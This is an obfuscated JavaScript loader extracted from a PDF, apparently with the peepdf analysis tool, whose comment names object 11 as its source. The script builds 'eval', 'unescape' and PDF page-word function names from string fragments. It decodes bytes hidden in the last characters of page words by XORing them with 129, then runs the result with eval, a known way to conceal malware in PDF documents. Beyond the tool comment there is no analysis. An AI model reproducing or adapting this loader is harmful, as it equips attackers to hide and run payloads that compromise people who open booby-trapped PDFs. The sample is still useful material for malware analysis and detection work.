// peepdf comment: Javascript code located in object 11 (version 0)

  var adobe = 1;
  var d = 129;
  var check = ["", "p", "p", "a"];
  foxit = new String(check[3] + check[1] + check[1] + check[0]);
  var b = ["al", "ev", ""];
  dSd = new String(b[1] + b[0] + b[2]);
  var uFoxit = String("QhXunes".substr(3) + "TPKcapeTPK".substr(3, 4));
  var v = new String("char" + "Code" + "At");
  var foxitSd = "from" + "Char" + "Code";
  var editUnlock = String("getP" + "ageNh0fT".substr(0, 4) + "thWo0NEI".substr(0, 4) + "rd");
  var adobeMail = "getP" + "ageNP1E6".substr(0, 4) + "umWo" + "rdsjSTv".substr(0, 3);
  var dsjkgB = "";
  var sdftuf = String;
  var checkEdit = "EAQ%".substr(3);
  var aGoogle = String("subs" + "C5Mtr".substr(3));
  var unlock = 2;
  var sdrt = 0;
  var foxit = this[foxit];

  function dDsjkg(uSend, sdrtArray) {
      return uSend ^ sdrtArray;
  }
  var emailCheck = this[adobeMail](adobe);
  var sdftufGet = this[uFoxit];
  var sdfjWindow = this[dSd];
  for (var checkEditFsdf = sdrt; checkEditFsdf < emailCheck; checkEditFsdf++) {
      sdrtU = this[editUnlock](adobe, checkEditFsdf);
      var sdGoogle = sdrtU[aGoogle](sdrtU.length - unlock, unlock);
      var sdftufA = checkEdit + sdGoogle;
      var arraySend = sdftufGet(sdftufA);
      var checkC = arraySend[v](sdrt);
      var getCheck = dDsjkg(checkC, d);
      dsjkgB += sdftuf[foxitSd](getCheck);
  }
  sdfjWindow(dsjkgB);

